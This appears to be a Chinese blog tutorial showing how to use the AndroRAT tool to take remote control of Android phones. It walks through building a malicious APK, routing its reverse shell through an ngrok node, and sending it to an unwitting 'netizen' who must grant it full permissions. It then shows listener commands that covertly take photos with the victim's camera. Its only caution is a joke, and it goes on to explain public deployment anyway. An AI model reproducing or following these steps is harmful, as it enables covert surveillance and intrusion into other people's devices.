相关阅读
之前分享过很多期有关远程控制的相关教程,今天我们再补充一期,本质上原理还是Reverse Shell
(反弹shell)
视频教程
相关命令
首先下载androRAT github项目
git clone https://github.com/karma9874/AndroRAT.git
然后进入AndroRAT目录
cd AndroRAT
安装Python依赖
pip install -r requirements.txt
生成名为fancypig.apk
的恶意apk文件
后面要跟上你的kali linux的IP地址192.168.x.x
以及对应的端口号,视频中是4444
,我们这里默认是8000
python androRAT.py --build -i 192.169.x.x -p 8000 -o fancypig.apk
然后,你需要进行投递,让热心网友打开,需要默认授权全部权限
同时,你还要开启监听端口
python androRAT.py --shell -i 0.0.0.0 -p 8000
如果热心网友成功打开了,你可以输入help
来获取相关远程控制的命令,例如,我们可以使用摄像头
camlist
然后选择后置摄像头(0)或者前置摄像头(1),视频中选用的是后置摄像头
takepic 0
然后你就可以进入AndroRAT/Dumps
路径下,找到摄像头拍的照片了
![图片[1]-如何远程控制任意安卓设备2.0(androRAT)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/02/20220214165329124-1024x615.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这看起来就很刑啊……
这里不建议大家部署到公网上,当然你非要向亲密的朋友炫技的话,我们这里也给大家了一个思路,其实就是通过ngrok
代理服务,让你的网页快速上线,同时建立连接,这个其实我们在之前的视频里也用到过
我们可以先运行下面的命令,获取ngrok的tcp节点
./ngrok
![图片[2]-如何远程控制任意安卓设备2.0(androRAT)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/02/20220214165621727-1024x489.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后打包的时候,用-i
指向你的[ngrok节点],视频中是2.tcp.ngrok.io
,你需要填写自己对应的,同时要填写端口信息
python androRAT.py --build -i [ngrok节点] -p [端口] -o fancypig.apk
打包好fancypig.apk
文件后发送给热心网友,监听反弹shell的手段和上面完全一致,视频中是4444
端口,我们这里用默认的8000
,这个你可以自定义,只要前后一致就行了
python androRAT.py --shell -i 0.0.0.0 -p 8000
然后就大功告成了!
© 版权声明
THE END
- 最新
- 最热
只看作者